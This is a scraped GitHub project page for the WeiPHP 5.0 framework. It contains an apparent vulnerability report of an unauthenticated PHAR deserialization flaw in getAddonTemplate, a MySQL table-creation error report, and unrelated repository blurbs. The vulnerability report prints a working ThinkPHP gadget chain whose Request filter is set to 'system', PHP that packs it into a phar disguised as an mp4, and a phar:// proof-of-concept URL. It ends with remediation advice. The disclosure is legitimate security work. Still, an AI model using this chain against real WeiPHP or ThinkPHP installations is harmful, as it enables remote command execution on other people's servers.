weiphpdev / weiphp5.0 Goto Github PK
View Code? Open in Web Editor NEWWeiPHP5.0,公众号与小程序结合的最佳开发框架,,它实现一个后台同时管理和运营多个客户端(公众号,微信小程序,后续将支持支付宝小程序,百度小程序等)
License: Other
WeiPHP5.0,公众号与小程序结合的最佳开发框架,,它实现一个后台同时管理和运营多个客户端(公众号,微信小程序,后续将支持支付宝小程序,百度小程序等)
License: Other
vendor: https://github.com/weiphpdev/weiphp5.0
version: 5.0
php version: 7.x
A PHAR deserialization vulnerability is identified in the WEIPHP 5.0 version within the getAddonTemplate
function. This flaw allows attackers to inject arbitrary PHAR format parameters into the templateFile
parameter, thereby compelling the application to trigger deserialization in the file_exists
check. Notably, this vulnerability can be exploited without any form of authentication.
The implications of this vulnerability include:
The vulnerability stems from the lack of validation for input parameters in the getAddonTemplate
function. Parameters are passed directly into the file_exists
function, triggering PHAR deserialization and potentially further activation of other forms of PHP wrappers.
Files of this class are registered as BaseController
and the functions are public. Hence, other controllers inheriting from this class can invoke the method, amplifying the risk associated with this vulnerability.
file path: application/common/controller/Base.php
public function getAddonTemplate($templateFile = '')
{
if (file_exists($templateFile)) {
return $templateFile;
}
if (empty($templateFile)) {
$path = env('app_path') . parse_name(MODULE_NAME) . '/view/' . parse_name(CONTROLLER_NAME) . '/' . ACTION_NAME . '.html';
$new_path = env('app_path') . '/common/view/base/' . ACTION_NAME . '.html';
if (file_exists($path)) {
$templateFile = $path;
} elseif (file_exists($new_path)) {
$templateFile = 'common@base/' . ACTION_NAME;
}
} elseif (stripos($templateFile, '@') === false && stripos($templateFile, '/') === false) {
// 如index
$path = env('app_path') . parse_name(MODULE_NAME) . '/view/' . parse_name(CONTROLLER_NAME) . '/' . $templateFile . '.html';
$new_path = env('app_path') . '/common/view/base/' . $templateFile . '.html';
if (!file_exists($path) && file_exists($new_path)) {
$templateFile = 'common@base/' . $templateFile;
}
}
return $templateFile;
}
Use the following code to generate an mp4 file containing malicious data
<?php
namespace think;
abstract class Model{
protected $append = [];
private $data = [];
public function __construct()
{
$this->append = ["li"=>[]];
$this->data = ["li"=>new Request()];
}
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows{
private $files = [];
public function __construct()
{
$this->files = [new Pivot()];
}
}
namespace think\model;
use think\model;
class Pivot extends Model{
}
namespace think;
class Request{
protected $hook = [];
protected $filter;
protected $config;
protected $param = [];
public function __construct()
{
$this->hook = ["visible"=>[$this,"isAjax"]];
$this->filter = 'system';
$this->config = ["var_ajax"=>''];//Attach a value to this key name
$this->param = ['dir'];
}
}
use think\process\pipes\Windows;
$phar = new \Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('exploit.txt', 'This is an exploit file.');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new Windows());
$phar->stopBuffering();
Then upload it in the location shown below
PoC:
http://127.0.0.1/index.php/draw/api/getAddonTemplate?templateFile=phar://uploads/download/20240322/65fcf450e90f2.mp4
Firstly, user authentication should be added to the specified interface, giving a strict checksum process at the file upload. Secondly, the incoming filename should be checked so that the prefix is not controllable and only the latter part is controllable.
SQLSTATE | 42000 |
---|---|
Driver Error Code | 1064 |
Driver Error Message | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0) NULL DEFAULT CURRENT_TIMESTAMP(0) COMMENT '更新时间', notice_erp in' at line 63 |
$this->numRows = $this->PDOStatement->rowCount();
return $this->numRows;
} catch (\PDOException $e) {
if ($this->isBreak($e)) {
return $this->close()->execute($sql, $bind, $query);
}
throw new PDOException($e, $this->config, $this->getLastsql());
} catch (\Throwable $e) {
if ($this->isBreak($e)) {
return $this->close()->execute($sql, $bind, $query);
}
throw $e;
} catch (\Exception $e) {
if ($this->isBreak($e)) {
return $this->close()->execute($sql, $bind, $query);
notice_erp
in' at line 63Error SQL | CREATE TABLE wp_shop_order
( id
int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT '主键', goods_datas
text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '商品序列化数据', uid
int(10) UNSIGNED NOT NULL COMMENT '用户id', remark
text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '备注', order_number
varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '订单编号', cTime
int(10) NOT NULL COMMENT '订单时间', total_price
decimal(10, 2) NULL DEFAULT NULL COMMENT '总价', openid
varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT 'OpenID', pay_status
int(10) NULL DEFAULT NULL COMMENT '支付状态', pay_type
tinyint(2) NULL DEFAULT 0 COMMENT '支付类型', address_id
int(10) NULL DEFAULT NULL COMMENT '配送信息', is_send
int(10) NULL DEFAULT 0 COMMENT '是否发货', send_code
varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '快递公司编号', send_number
varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '快递单号', send_type
char(10) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '发货类型', is_new
tinyint(2) NULL DEFAULT 1 COMMENT '是否为新订单', wpid
int(10) NULL DEFAULT NULL COMMENT 'wpid', status_code
char(50) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT '0' COMMENT '订单跟踪状态码', event_type
tinyint(2) NULL DEFAULT 0 COMMENT '订单来源', is_lock
int(10) NULL DEFAULT 1 COMMENT '数量是否锁定', erp_lock_code
text CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT 'ERP锁定商品编号', mail_money
float NULL DEFAULT 0 COMMENT '邮费金额', stores_id
int(10) NULL DEFAULT NULL COMMENT '门店编号', pay_time
int(10) NULL DEFAULT NULL COMMENT '支付时间', send_time
int(10) NULL DEFAULT NULL COMMENT '发货时间', extra
text CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '扩展参数', order_state
int(10) NULL DEFAULT 1 COMMENT '订单状态', out_trade_no
varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '支付的订单号', event_id
int(10) NULL DEFAULT NULL COMMENT '活动ID', is_original
tinyint(2) NULL DEFAULT 0 COMMENT '活动中是否原价购买', update_at
timestamp(0) NULL DEFAULT CURRENT_TIMESTAMP(0) COMMENT '更新时间', notice_erp
int(11) NULL DEFAULT 0 COMMENT '为0时不需要推送,大于0时需要推送', refund
tinyint(1) NULL DEFAULT 0 COMMENT '退款状态', refund_content
varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '退款原因', pay_money
decimal(10, 2) NULL DEFAULT NULL COMMENT '实付价格', dec_money
decimal(10, 2) NULL DEFAULT NULL COMMENT '优惠价格', PRIMARY KEY (id
) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 1 CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Compact
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.